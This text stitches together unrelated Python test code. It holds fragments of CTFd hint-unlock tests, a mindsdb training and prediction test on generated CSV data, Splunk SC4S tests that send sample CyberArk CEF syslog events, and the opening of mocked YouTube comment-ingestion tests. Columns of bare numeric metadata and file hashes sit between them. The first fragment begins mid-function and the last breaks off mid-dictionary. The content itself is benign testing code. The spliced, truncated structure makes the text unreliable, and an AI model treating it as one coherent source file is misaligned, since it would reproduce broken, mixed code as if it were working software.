set_config(
"start", "1507089600"
) # Wednesday, October 4, 2017 12:00:00 AM GMT-04:00 DST
set_config(
"end", "1507262400"
) # Friday, October 6, 2017 12:00:00 AM GMT-04:00 DST
with freeze_time("2017-10-1"):
client = login_as_user(app)
r = client.get("/api/v1/hints/1")
assert r.status_code == 403
assert r.get_json().get("data") is None
r = client.post("/api/v1/unlocks", json={"target": 1, "type": "hints"})
assert r.status_code == 403
assert r.get_json().get("data") is None
r = client.get("/api/v1/hints/1")
assert r.get_json().get("data") is None
assert r.status_code == 403
user = Users.query.filter_by(id=2).first()
assert user.score == 100
assert Unlocks.query.count() == 0
destroy_ctfd(app)
def test_unlocking_hints_with_cost_during_ended_ctf():
"""Test that hints with a cost are not unlocked if the CTF has ended"""
app = create_ctfd()
with app.app_context():
register_user(app)
chal = gen_challenge(app.db)
chal_id = chal.id
gen_hint(app.db, chal_id, cost=10)
gen_award(app.db, user_id=2)
set_config(
"start", "1507089600"
) # Wednesday, October 4, 2017 12:00:00 AM GMT-04:00 DST
set_config(
"end", "1507262400"
) # Friday, October 6, 2017 12:00:00 AM GMT-04:00 DST
with freeze_time("2017-11-4"):
client = login_as_user(app)
r = client.get("/api/v1/hints/1")
assert r.get_json().get("data") is None
assert r.status_code == 403
r = client.post("/api/v1/unlocks", json={"target": 1, "type": "hints"})
assert r.status_code == 403
assert r.get_json()
r = client.get("/api/v1/hints/1")
assert r.status_code == 403
user = Users.query.filter_by(id=2).first()
assert user.score == 100
assert Unlocks.query.count() == 0
destroy_ctfd(app)
def test_unlocking_hints_with_cost_during_frozen_ctf():
"""Test that hints with a cost are unlocked if the CTF is frozen."""
app = create_ctfd()
with app.app_context():
set_config(
"freeze", "1507262400"
) # Friday, October 6, 2017 12:00:00 AM GMT-04:00 DST
with freeze_time("2017-10-4"):
register_user(app)
chal = gen_challenge(app.db)
chal_id = chal.id
gen_hint(app.db, chal_id, cost=10)
gen_award(app.db, user_id=2)
with freeze_time("2017-10-8"):
client = login_as_user(app)
client.get("/api/v1/hints/1")
client.post("/api/v1/unlocks", json={"target": 1, "type": "hints"})
r = client.get("/api/v1/hints/1")
resp = r.get_json()["data"]
assert resp.get("content") == "This is a hint"
user = Users.query.filter_by(id=2).first()
assert user.score == 100
destroy_ctfd(app)
def test_unlocking_hint_for_unicode_challenge():
"""Test that hints for challenges with unicode names can be unlocked"""
app = create_ctfd()
with app.app_context():
register_user(app)
chal = gen_challenge(app.db, name=text_type("🐺"))
chal_id = chal.id
gen_hint(app.db, chal_id)
client = login_as_user(app)
r = client.get("/api/v1/hints/1")
assert r.status_code == 200
resp = r.get_json()["data"]
assert resp.get("content") == "This is a hint"
destroy_ctfd(app)
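# The unlock tests above all walk the same three-step flow: peek at the hint
# (content hidden), POST an unlock, then fetch the hint again. A minimal sketch
# of that flow as a reusable helper follows; the helper name and return shape
# are illustrative assumptions, not part of CTFd's test suite.
def attempt_hint_unlock(client, hint_id):
    """Peek at a hint, try to unlock it, and return the final hint payload."""
    client.get("/api/v1/hints/{}".format(hint_id))  # content should still be hidden here
    client.post("/api/v1/unlocks", json={"target": hint_id, "type": "hints"})
    r = client.get("/api/v1/hints/{}".format(hint_id))
    return r.get_json().get("data")  # None when the unlock was rejected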
| 32.003623
| 83
| 0.574437
| 1,245
| 8,833
| 3.898795
| 0.114859
| 0.035847
| 0.028018
| 0.043263
| 0.874536
| 0.854965
| 0.834363
| 0.811908
| 0.795426
| 0.751751
| 0
| 0.043103
| 0.290841
| 8,833
| 275
| 84
| 32.12
| 0.731641
| 0.097928
| 0
| 0.733668
| 0
| 0
| 0.109651
| 0
| 0
| 0
| 0
| 0
| 0.170854
| 1
| 0.045226
| false
| 0.01005
| 0.020101
| 0
| 0.065327
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f4016e3c852969867120617a8aaf201456e33c12
| 14,090
|
py
|
Python
|
tests/integration_tests/generated_data_tests.py
|
mohsinkhansymc/mindsdb
|
84376b50a9ea2fa695f5288479170cd73e147fae
|
[
"MIT"
] | null | null | null |
tests/integration_tests/generated_data_tests.py
|
mohsinkhansymc/mindsdb
|
84376b50a9ea2fa695f5288479170cd73e147fae
|
[
"MIT"
] | null | null | null |
tests/integration_tests/generated_data_tests.py
|
mohsinkhansymc/mindsdb
|
84376b50a9ea2fa695f5288479170cd73e147fae
|
[
"MIT"
] | 1
|
2019-10-06T20:14:59.000Z
|
2019-10-06T20:14:59.000Z
|
from data_generators import *
import traceback
import sys
import os
import itertools
import logging
from colorlog import ColoredFormatter
import time
import mindsdb
from mindsdb import CONST
types_that_fail = ['str']
types_that_work = ['int','float','date','datetime','timestamp','ascii']
logger = None
def setup_testing_logger():
global logger
formatter = ColoredFormatter(
"%(log_color)s%(message)s",
datefmt=None,
reset=True,
log_colors={
'DEBUG': 'black,bg_white',
'INFO': 'blue,bg_white',
            'WARNING': 'yellow,bg_white',  # colorlog has no 'orange'; yellow is the closest supported color
'ERROR': 'red,bg_white',
'CRITICAL': 'red,bg_white',
}
)
logger = logging.getLogger('mindsdb_integration_testing')
logger.handlers = []
handler = logging.StreamHandler()
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.setLevel(logging.DEBUG)
def test_timeseries():
    logger.info('Starting timeseries test!')
ts_hours = 12
separator = ','
data_len = 1200
train_file_name = 'train_data.csv'
test_file_name = 'test_data.csv'
# Create the full dataset
logger.debug(f'Creating timeseries test datasets and saving them to {train_file_name} and {test_file_name}, total dataset size will be {data_len} rows')
try:
# add ,'ascii' in the features list to re-implement the group by
features = generate_value_cols(['date','int'],data_len, separator, ts_hours * 3600)
#features[3] = list(map(lambda x: str(x[0]) if len(x) > 0 else 'Nrmm', features[3]))
labels = [generate_labels_2(features, separator)]
feature_headers = list(map(lambda col: col[0], features))
label_headers = list(map(lambda col: col[0], labels))
# Create the training dataset and save it to a file
columns_train = list(map(lambda col: col[1:int(len(col)*3/4)], features))
columns_train.extend(list(map(lambda col: col[1:int(len(col)*3/4)], labels)))
columns_to_file(columns_train, train_file_name, separator, headers=[*feature_headers,*label_headers])
# Create the testing dataset and save it to a file
columns_test = list(map(lambda col: col[int(len(col)*3/4):], features))
columns_to_file(columns_test, test_file_name, separator, headers=feature_headers)
        logger.debug(f'Datasets generated and saved to files successfully')
except:
print(traceback.format_exc())
        logger.error(f'Failed to generate datasets!')
exit(1)
# Train
mdb = None
try:
mdb = mindsdb.Predictor(name='test_date_timeseries_2')
        logger.debug(f'Successfully created mindsdb Predictor')
except:
print(traceback.format_exc())
logger.error(f'Failed to create mindsdb Predictor')
exit(1)
try:
mdb.learn(
from_data=train_file_name,
to_predict=label_headers
            # timeseries specific args
,order_by=feature_headers[0]
#,window_size_seconds=ts_hours* 3600 * 1.5
,window_size=3
#,group_by = feature_headers[3]
,use_gpu=False
,backend='lightwood'
)
        logger.info(f'--------------- Learning ran successfully ---------------')
except:
print(traceback.format_exc())
        logger.error(f'Failed during the training!')
exit(1)
# Predict
try:
mdb = mindsdb.Predictor(name='test_date_timeseries_2')
        logger.debug(f'Successfully created mindsdb Predictor')
except:
print(traceback.format_exc())
logger.error(f'Failed to create mindsdb Predictor')
exit(1)
try:
results = mdb.predict(when_data=test_file_name,use_gpu=False)
for row in results:
expect_columns = [label_headers[0] ,label_headers[0] + '_confidence']
for col in expect_columns:
if col not in row:
logger.error(f'Prediction failed to return expected column: {col}')
logger.debug('Got row: {}'.format(row))
exit(1)
models = mdb.get_models()
print(models)
mdb.get_model_data(models[0]['name'])
        logger.info(f'--------------- Predicting ran successfully ---------------')
except:
print(traceback.format_exc())
logger.error(f'Failed whilst predicting')
exit(1)
    logger.info('Timeseries test ran successfully!')
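# The dataset builders in these tests follow one convention: every generated
# column is a list whose first element is the header and whose remainder is
# data, so col[1:int(len(col)*3/4)] and col[int(len(col)*3/4):] split each
# column roughly 75/25 into train and test rows. A self-contained sketch of
# that convention (the helper name is illustrative, not part of this suite):
def split_column(col, train_fraction=3 / 4):
    """Split a [header, v1, v2, ...] column into (train_values, test_values)."""
    cut = int(len(col) * train_fraction)
    return col[1:cut], col[cut:]

# e.g. split_column(['age', 1, 2, 3, 4, 5, 6, 7]) -> ([1, 2, 3, 4, 5], [6, 7])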
def test_one_label_prediction():
logger.info('Starting one-label test')
separator = ','
train_file_name = 'train_data.csv'
test_file_name = 'test_data.csv'
data_len = 8000
# Create the full dataset
    logger.debug(f'Creating one-label test datasets and saving them to {train_file_name} and {test_file_name}, total dataset size will be {data_len} rows')
try:
features = generate_value_cols(['int','float','nr_category'],data_len, separator)
labels = [generate_labels_2(features, separator)]
feature_headers = list(map(lambda col: col[0], features))
label_headers = list(map(lambda col: col[0], labels))
# Create the training dataset and save it to a file
columns_train = list(map(lambda col: col[1:int(len(col)*3/4)], features))
columns_train.extend(list(map(lambda col: col[1:int(len(col)*3/4)], labels)))
columns_to_file(columns_train, train_file_name, separator, headers=[*feature_headers,*label_headers])
# Create the testing dataset and save it to a file
columns_test = list(map(lambda col: col[int(len(col)*3/4):], features))
columns_to_file(columns_test, test_file_name, separator, headers=feature_headers)
        logger.debug(f'Datasets generated and saved to files successfully')
except:
print(traceback.format_exc())
        logger.error(f'Failed to generate datasets!')
exit(1)
# Train
mdb = None
try:
mdb = mindsdb.Predictor(name='test_one_label_prediction')
        logger.debug(f'Successfully created mindsdb Predictor')
except:
logger.error(f'Failed to create mindsdb Predictor')
exit(1)
try:
mdb.learn(from_data=train_file_name, to_predict=label_headers)
        logger.info(f'--------------- Learning ran successfully ---------------')
except:
print(traceback.format_exc())
        logger.error(f'Failed during the training!')
exit(1)
# Predict
try:
mdb = mindsdb.Predictor(name='test_one_label_prediction')
        logger.debug(f'Successfully created mindsdb Predictor')
except:
print(traceback.format_exc())
logger.error(f'Failed to create mindsdb Predictor')
exit(1)
try:
results = mdb.predict(when_data=test_file_name)
models = mdb.get_models()
mdb.get_model_data(models[0]['name'])
for row in results:
expect_columns = [label_headers[0] ,label_headers[0] + '_confidence']
for col in expect_columns:
if col not in row:
logger.error(f'Prediction failed to return expected column: {col}')
logger.debug('Got row: {}'.format(row))
exit(1)
        logger.info(f'--------------- Predicting ran successfully ---------------')
except:
print(traceback.format_exc())
logger.error(f'Failed whilst predicting')
exit(1)
    logger.info('One-label prediction test ran successfully!')
def test_one_label_prediction_wo_strings():
    logger.info('Starting one-label (no string columns) test')
separator = ','
train_file_name = 'train_data.csv'
test_file_name = 'test_data.csv'
data_len = 8000
# Create the full dataset
    logger.debug(f'Creating one-label test datasets and saving them to {train_file_name} and {test_file_name}, total dataset size will be {data_len} rows')
try:
features = generate_value_cols(['int','float','datetime','date','int'],data_len, separator)
labels = [generate_labels_2(features, separator)]
feature_headers = list(map(lambda col: col[0], features))
label_headers = list(map(lambda col: col[0], labels))
# Create the training dataset and save it to a file
columns_train = list(map(lambda col: col[1:int(len(col)*3/4)], features))
columns_train.extend(list(map(lambda col: col[1:int(len(col)*3/4)], labels)))
columns_to_file(columns_train, train_file_name, separator, headers=[*feature_headers,*label_headers])
# Create the testing dataset and save it to a file
columns_test = list(map(lambda col: col[int(len(col)*3/4):], features))
columns_to_file(columns_test, test_file_name, separator, headers=feature_headers)
        logger.debug(f'Datasets generated and saved to files successfully')
except:
print(traceback.format_exc())
        logger.error(f'Failed to generate datasets!')
exit(1)
# Train
mdb = None
try:
mdb = mindsdb.Predictor(name='test_one_label_prediction_wo_strings')
        logger.debug(f'Successfully created mindsdb Predictor')
except:
logger.error(f'Failed to create mindsdb Predictor')
exit(1)
try:
mdb.learn(from_data=train_file_name, to_predict=label_headers)
        logger.info(f'--------------- Learning ran successfully ---------------')
except:
print(traceback.format_exc())
        logger.error(f'Failed during the training!')
exit(1)
# Predict
try:
mdb = mindsdb.Predictor(name='test_one_label_prediction_wo_strings')
        logger.debug(f'Successfully created mindsdb Predictor')
except:
print(traceback.format_exc())
logger.error(f'Failed to create mindsdb Predictor')
exit(1)
try:
results = mdb.predict(when_data=test_file_name)
models = mdb.get_models()
mdb.get_model_data(models[0]['name'])
for row in results:
expect_columns = [label_headers[0] ,label_headers[0] + '_confidence']
for col in expect_columns:
if col not in row:
logger.error(f'Prediction failed to return expected column: {col}')
logger.debug('Got row: {}'.format(row))
exit(1)
        logger.info(f'--------------- Predicting ran successfully ---------------')
except:
print(traceback.format_exc())
logger.error(f'Failed whilst predicting')
exit(1)
    logger.info('One-label (no string columns) prediction test ran successfully!')
def test_multilabel_prediction():
logger.info('Starting multilabel prediction test')
separator = ','
train_file_name = 'train_data.csv'
test_file_name = 'test_data.csv'
data_len = 600
# Create the full dataset
logger.debug(f'Creating multilabel test datasets and saving them to {train_file_name} and {test_file_name}, total dataset size will be {data_len} rows')
try:
features = generate_value_cols(['int','float','int','float'], data_len, separator)
labels = []
labels.append(generate_labels_3(features, separator))
labels.append(generate_labels_2(features, separator))
labels.append(generate_labels_1(features, separator))
feature_headers = list(map(lambda col: col[0], features))
label_headers = list(map(lambda col: col[0], labels))
# Create the training dataset and save it to a file
columns_train = list(map(lambda col: col[1:int(len(col)*3/4)], features))
columns_train.extend(list(map(lambda col: col[1:int(len(col)*3/4)], labels)))
columns_to_file(columns_train, train_file_name, separator, headers=[*feature_headers,*label_headers])
# Create the testing dataset and save it to a file
columns_test = list(map(lambda col: col[int(len(col)*3/4):], features))
columns_to_file(columns_test, test_file_name, separator, headers=feature_headers)
        logger.debug(f'Multilabel datasets generated and saved to files successfully')
except:
print(traceback.format_exc())
        logger.error(f'Failed to generate datasets!')
exit(1)
# Train
mdb = None
try:
mdb = mindsdb.Predictor(name='test_multilabel_prediction')
        logger.debug(f'Successfully created mindsdb Predictor')
except:
logger.error(f'Failed to create mindsdb Predictor')
exit(1)
try:
mdb.learn(from_data=train_file_name, to_predict=label_headers)
        logger.info(f'--------------- Learning ran successfully ---------------')
except:
print(traceback.format_exc())
        logger.error(f'Failed during the training!')
exit(1)
# Predict
try:
mdb = mindsdb.Predictor(name='test_multilabel_prediction')
        logger.debug(f'Successfully created mindsdb Predictor')
except:
print(traceback.format_exc())
logger.error(f'Failed to create mindsdb Predictor')
exit(1)
try:
results = mdb.predict(when_data=test_file_name)
models = mdb.get_models()
mdb.get_model_data(models[0]['name'])
        for row in results:
            expect_columns = [label_headers[0], label_headers[0] + '_confidence']
            for col in expect_columns:
                if col not in row:
                    logger.error(f'Prediction failed to return expected column: {col}')
                    logger.debug('Got row: {}'.format(row))
                    exit(1)
                print(row[col])  # safe to index now that the column is known to exist
        logger.info(f'--------------- Predicting ran successfully ---------------')
except:
print(traceback.format_exc())
logger.error(f'Failed whilst predicting')
exit(1)
    logger.info('Multilabel prediction test ran successfully!')
separator = ','
data_file_name = 'test_data.csv'
data_len = 10000
setup_testing_logger()
if __name__ == '__main__':
test_timeseries()
test_one_label_prediction_wo_strings()
test_multilabel_prediction()
test_one_label_prediction()
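# All three predict phases above repeat the same per-row check: each predicted
# label must come back alongside a matching '<label>_confidence' column. A
# compact sketch of that assertion as a helper (the name is illustrative):
def assert_prediction_columns(results, label):
    """Fail if any prediction row lacks the label or its confidence column."""
    expected = [label, label + '_confidence']
    for row in results:
        for col in expected:
            assert col in row, 'Prediction row missing column {}: {}'.format(col, row)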
| 36.314433
| 156
| 0.632789
| 1,776
| 14,090
| 4.842342
| 0.102477
| 0.030698
| 0.033488
| 0.037209
| 0.845233
| 0.841628
| 0.828023
| 0.823953
| 0.803837
| 0.803837
| 0
| 0.011546
| 0.243932
| 14,090
| 387
| 157
| 36.408269
| 0.795738
| 0.056068
| 0
| 0.744108
| 0
| 0.013468
| 0.245819
| 0.020265
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016835
| false
| 0
| 0.03367
| 0
| 0.050505
| 0.063973
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f4376cee06201700e770ec5750613274e9295058
| 5,448
|
py
|
Python
|
tests/test_cyberark.py
|
ccDev-Labs/splunk-connect-for-syslog
|
2b30c711b4e53135444b485623bfc610ac2f19e2
|
[
"BSD-2-Clause",
"CC0-1.0"
] | null | null | null |
tests/test_cyberark.py
|
ccDev-Labs/splunk-connect-for-syslog
|
2b30c711b4e53135444b485623bfc610ac2f19e2
|
[
"BSD-2-Clause",
"CC0-1.0"
] | null | null | null |
tests/test_cyberark.py
|
ccDev-Labs/splunk-connect-for-syslog
|
2b30c711b4e53135444b485623bfc610ac2f19e2
|
[
"BSD-2-Clause",
"CC0-1.0"
] | null | null | null |
# Copyright 2019 Splunk, Inc.
#
# Use of this source code is governed by a BSD-2-clause-style
# license that can be found in the LICENSE-BSD2 file or at
# https://opensource.org/licenses/BSD-2-Clause
import random
from jinja2 import Environment
from .sendmessage import *
from .splunkutils import *
from .timeutils import *
env = Environment()
#<5>1 2020-01-24T22:53:03Z REDACTEDHOSTNAME CEF:0|Cyber-Ark|Vault|10.9.0000|22|CPM Verify Password|5|act="CPM Verify Password" suser=PasswordManager fname=Root\Operating System-OBO-ISSO-Windows-Domain-Account-redacted dvc= shost=10.0.0.10 dhost= duser=redacted externalId= app= reason= cs1Label="Affected User Name" cs1= cs2Label="Safe Name" cs2="re-dact-ted" cs3Label="Device Type" cs3="Operating System" cs4Label="Database" cs4= cs5Label="Other info" cs5= cn1Label="Request Id" cn1= cn2Label="Ticket Id" cn2="VerificationPeriod" msg="VerificationPeriod"
def test_cyberark_epv_5424(record_property, setup_wordlist, setup_splunk, setup_sc4s):
host = "{}-{}".format(random.choice(setup_wordlist), random.choice(setup_wordlist))
dt = datetime.datetime.now(datetime.timezone.utc)
iso, bsd, time, date, tzoffset, tzname, epoch = time_operations(dt)
# Tune time functions
iso = dt.isoformat()[0:19]
epoch = epoch[:-7]
mt = env.from_string(
"{{ mark }}1 {{ iso }}Z {{ host }} CEF:0|Cyber-Ark|Vault|9.20.0000|7|Logon|5|act=\"Logon\" suser=PasswordManager fname= dvc= shost=10.0.0.10 dhost= duser= externalId= app= reason= cs1Label=\"Affected User Name\" cs1= cs2Label=\"Safe Name\" cs2= cs3Label=\"Device Type\" cs3=11111 cs4Label=\"Database\" cs4=222222 cs5Label=\"Other info\" cs5= cn1Label=\"Request Id\" cn1= cn2Label=\"Ticket Id\" cn2= msg=\n")
message = mt.render(mark="<111>", iso=iso, host=host)
sendsingle(message, setup_sc4s[0], setup_sc4s[1][514])
st = env.from_string("search _time={{ epoch }} index=netauth host=\"{{ host }}\" sourcetype=\"cyberark:epv:cef\"| head 2")
search = st.render(epoch=epoch, host=host)
resultCount, eventCount = splunk_single(setup_splunk, search)
record_property("host", host)
record_property("resultCount", resultCount)
record_property("message", message)
assert resultCount == 1
#<190>Jul 27 23:31:58 VAULT CEF:0|Cyber-Ark|Vault|9.20.0000|7|Logon|5|act="Logon" suser=user2 fname= dvc= shost=127.0.0.1 dhost= duser= externalId= app= reason= cs1Label="Affected User Name" cs1= cs2Label="Safe Name" cs2= cs3Label="Device Type" cs3=11111 cs4Label="Database" cs4=222222 cs5Label="Other info" cs5= cn1Label="Request Id" cn1= cn2Label="Ticket Id" cn2= msg=
def test_cyberark_epv(record_property, setup_wordlist, setup_splunk, setup_sc4s):
host = "{}-{}".format(random.choice(setup_wordlist), random.choice(setup_wordlist))
dt = datetime.datetime.now()
iso, bsd, time, date, tzoffset, tzname, epoch = time_operations(dt)
# Tune time functions
epoch = epoch[:-7]
mt = env.from_string(
"{{ mark }}{{ bsd }} {{ host }} CEF:0|Cyber-Ark|Vault|9.20.0000|7|Logon|5|act=\"Logon\" suser=user2 fname= dvc= shost=127.0.0.1 dhost= duser= externalId= app= reason= cs1Label=\"Affected User Name\" cs1= cs2Label=\"Safe Name\" cs2= cs3Label=\"Device Type\" cs3=11111 cs4Label=\"Database\" cs4=222222 cs5Label=\"Other info\" cs5= cn1Label=\"Request Id\" cn1= cn2Label=\"Ticket Id\" cn2= msg=\n")
message = mt.render(mark="<111>", bsd=bsd, host=host)
sendsingle(message, setup_sc4s[0], setup_sc4s[1][514])
st = env.from_string("search _time={{ epoch }} index=netauth host=\"{{ host }}\" sourcetype=\"cyberark:epv:cef\"| head 2")
search = st.render(epoch=epoch, host=host)
resultCount, eventCount = splunk_single(setup_splunk, search)
record_property("host", host)
record_property("resultCount", resultCount)
record_property("message", message)
assert resultCount == 1
#<190>Jul 12 23:44:25 10.0.0.1 CEF:0|CyberArk|PTA|2.6.1|20|Privileged account anomaly|8|cs1Label=incidentId cs1=55a32ed8e4b0e4a90114e12c start=1436755482000 deviceCustomDate1Label=detectionDate deviceCustomDate1=1436759065017 msg=Incident updated. Now contains 7 anomalies cs2Label=link cs2=https://10.0.0.1/incidents/55a32ed8e4b0e4a90114e12c
def test_cyberark_pta(record_property, setup_wordlist, setup_splunk, setup_sc4s):
host = "{}-{}".format(random.choice(setup_wordlist), random.choice(setup_wordlist))
dt = datetime.datetime.now()
iso, bsd, time, date, tzoffset, tzname, epoch = time_operations(dt)
# Tune time functions
epoch = epoch[:-7]
mt = env.from_string(
"{{ mark }}{{ bsd }} {{ host }} CEF:0|CyberArk|PTA|2.6.1|20|Privileged account anomaly|8|cs1Label=incidentId cs1=55a32ed8e4b0e4a90114e12c start=1436755482000 deviceCustomDate1Label=detectionDate deviceCustomDate1=1436759065017 msg=Incident updated. Now contains 7 anomalies cs2Label=link cs2=https://10.0.0.1/incidents/55a32ed8e4b0e4a90114e12c\n")
message = mt.render(mark="<111>", bsd=bsd, host=host)
sendsingle(message, setup_sc4s[0], setup_sc4s[1][514])
st = env.from_string("search _time={{ epoch }} index=main host=\"{{ host }}\" sourcetype=\"cyberark:pta:cef\"| head 2")
search = st.render(epoch=epoch, host=host)
resultCount, eventCount = splunk_single(setup_splunk, search)
record_property("host", host)
record_property("resultCount", resultCount)
record_property("message", message)
assert resultCount == 1
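# Each test above renders one syslog/CEF event from a jinja2 string template,
# sends it to SC4S, and then searches Splunk for it. A minimal, self-contained
# sketch of just the render step (the hostname and timestamp arguments below
# are placeholder values, not the real fixtures):
def render_cef_logon(host, bsd):
    template = env.from_string(
        "{{ mark }}{{ bsd }} {{ host }} CEF:0|Cyber-Ark|Vault|9.20.0000|7|Logon|5|act=\"Logon\"\n")
    return template.render(mark="<111>", bsd=bsd, host=host)

# e.g. render_cef_logon("test-host", "Jul 27 23:31:58") yields
# '<111>Jul 27 23:31:58 test-host CEF:0|Cyber-Ark|Vault|9.20.0000|7|Logon|5|act="Logon"\n'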
| 56.164948
| 556
| 0.720631
| 760
| 5,448
| 5.089474
| 0.259211
| 0.043433
| 0.02637
| 0.03878
| 0.814116
| 0.809721
| 0.809721
| 0.809721
| 0.792141
| 0.792141
| 0
| 0.085901
| 0.130323
| 5,448
| 96
| 557
| 56.75
| 0.730477
| 0.278084
| 0
| 0.709091
| 0
| 0.090909
| 0.312165
| 0.070645
| 0
| 0
| 0
| 0
| 0.054545
| 1
| 0.054545
| false
| 0.018182
| 0.090909
| 0
| 0.145455
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
be3babd13907177ef23fa4feb24fa32d28a78f05
| 19,330
|
py
|
Python
|
source/lambda/ingestion-youtube/test/test_comment.py
|
swipswaps/discovering-hot-topics-using-machine-learning
|
6de8b4670e5a00ad5bf2eb7c27895241d4ea95bf
|
[
"Apache-2.0"
] | null | null | null |
source/lambda/ingestion-youtube/test/test_comment.py
|
swipswaps/discovering-hot-topics-using-machine-learning
|
6de8b4670e5a00ad5bf2eb7c27895241d4ea95bf
|
[
"Apache-2.0"
] | null | null | null |
source/lambda/ingestion-youtube/test/test_comment.py
|
swipswaps/discovering-hot-topics-using-machine-learning
|
6de8b4670e5a00ad5bf2eb7c27895241d4ea95bf
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
######################################################################################################################
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance #
# with the License. A copy of the License is located at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# or in the 'license' file accompanying this file. This file is distributed on an 'AS IS' BASIS, WITHOUT WARRANTIES #
# OR CONDITIONS OF ANY KIND, express or implied. See the License for the specific language governing permissions #
# and limitations under the License. #
######################################################################################################################
import json
import os
from datetime import datetime, timedelta, timezone
from test.test_credential_helper import ssm_setup
from test.test_ddb_helper import ddb_setup
from test.test_stream_helper import stream_setup
from unittest.mock import patch
from moto import mock_dynamodb2, mock_kinesis, mock_ssm
from util.comment import Comment, search_comments, slice_text_into_arrays
api_response_time_format = "%Y-%m-%dT%H:%M:%SZ"
@mock_ssm
@mock_kinesis
@mock_dynamodb2
@patch("util.comment.get_youtube_service_resource")
def test_search_comments(mock_youtube_resource):
api_key = "fakeapikey"
ssm_setup(api_key)
ddb_setup(os.environ["TARGET_DDB_TABLE"])
kds_client = stream_setup(os.environ["STREAM_NAME"])
video_id = "fakeVideoId"
event = {
"version": "0",
"id": "fakeID",
"detailtype": "Video",
"source": "com.youtube.video",
"account": "fakeaccount",
"time": "2020-06-13T23:14:19Z",
"region": "us-east-1",
"resources": [],
"detail": {"VideoId": video_id, "SearchQuery": "fakeQuery", "Title": "fakeTitle"},
}
mock_youtube_resource.return_value.commentThreads.return_value.list.return_value.execute.return_value = {
"items": [
{
"id": "fakeId",
"kind": "youtube#commentThread",
"snippet": {
"topLevelComment": {
"id": "fakeCommentId",
"kind": "youtube#comment",
"snippet": {
"publishedAt": "2021-08-12T22:34:33Z",
"textDisplay": "Omg " "love " "it",
"textOriginal": "Omg " "love " "it",
"updatedAt": "2021-08-12T22:34:33Z",
"videoId": video_id,
"viewerRating": 2,
"likeCount": 0,
"updatedAt": datetime.now(timezone.utc).strftime(api_response_time_format),
},
},
"videoId": video_id,
},
}
],
"kind": "youtube#commentThreadListResponse",
"pageInfo": {"resultsPerPage": 100, "totalResults": 1},
"nextPageToken": None,
}
    assert search_comments(event) is None
@mock_ssm
@mock_kinesis
@mock_dynamodb2
@patch("util.comment.get_youtube_service_resource")
def test_search_comments_with_tracker_date(mock_youtube_resource):
api_key = "fakeapikey"
ssm_setup(api_key)
table_name = os.environ["TARGET_DDB_TABLE"]
ddb = ddb_setup(table_name)
video_id = "fakeVideoId"
current_time = datetime.now(timezone.utc)
expiry_window = str(
int((current_time + timedelta(days=int(os.environ.get("VIDEO_SEARCH_INGESTION_WINDOW", 7)))).timestamp() * 1000)
)
ddb_item = {
"VIDEO_ID": video_id,
"LAST_QUERIED_TIMESTAMP": (current_time - timedelta(days=2)).isoformat(),
"EXP_DATE": {"N": expiry_window},
}
table = ddb.Table(table_name)
table.put_item(Item=ddb_item)
kds_client = stream_setup(os.environ["STREAM_NAME"])
event = {
"version": "0",
"id": "fakeID",
"detailtype": "Video",
"source": "com.youtube.video",
"account": "fakeaccount",
"time": "2020-06-13T23:14:19Z",
"region": "us-east-1",
"resources": [],
"detail": {"VideoId": video_id, "SearchQuery": "fakeQuery", "Title": "fakeTitle"},
}
mock_youtube_resource.return_value.commentThreads.return_value.list.return_value.execute.return_value = {
"items": [
{
"id": "fakeId",
"kind": "youtube#commentThread",
"snippet": {
"topLevelComment": {
"id": "fakeCommentId",
"kind": "youtube#comment",
"snippet": {
"publishedAt": "2021-08-12T22:34:33Z",
"textDisplay": "Omg " "love " "it",
"textOriginal": "Omg " "love " "it",
"updatedAt": "2021-08-12T22:34:33Z",
"videoId": video_id,
"viewerRating": 2,
"likeCount": 0,
"updatedAt": datetime.now(timezone.utc).strftime(api_response_time_format),
},
},
"videoId": video_id,
},
}
],
"kind": "youtube#commentThreadListResponse",
"pageInfo": {"resultsPerPage": 100, "totalResults": 1},
"nextPageToken": None,
}
    assert search_comments(event) is None
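# Several tests in this file seed the DynamoDB tracker with the same item
# shape: the video id, an ISO last-queried timestamp, and a millisecond TTL
# attribute. A small factory for that shape (the function name is an
# illustrative assumption, not part of the solution's code):
def make_tracker_item(video_id, last_queried, expires_at):
    """Build a tracker item matching the ddb_item dicts used in these tests."""
    return {
        "VIDEO_ID": video_id,
        "LAST_QUERIED_TIMESTAMP": last_queried.isoformat(),
        "EXP_DATE": {"N": str(int(expires_at.timestamp() * 1000))},
    }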
@mock_ssm
@mock_kinesis
@mock_dynamodb2
@patch("util.comment.get_youtube_service_resource")
def test_search_comments_with_page_token(mock_youtube_resource):
api_key = "fakeapikey"
ssm_setup(api_key)
table_name = os.environ["TARGET_DDB_TABLE"]
ddb = ddb_setup(table_name)
video_id = "fakeVideoId"
current_time = datetime.now(timezone.utc)
expiry_window = str(
int((current_time + timedelta(days=int(os.environ.get("VIDEO_SEARCH_INGESTION_WINDOW", 7)))).timestamp() * 1000)
)
ddb_item = {
"VIDEO_ID": video_id,
"LAST_QUERIED_TIMESTAMP": (current_time - timedelta(days=2)).isoformat(),
"EXP_DATE": {"N": expiry_window},
}
table = ddb.Table(table_name)
table.put_item(Item=ddb_item)
kds_client = stream_setup(os.environ["STREAM_NAME"])
event = {
"version": "0",
"id": "fakeID",
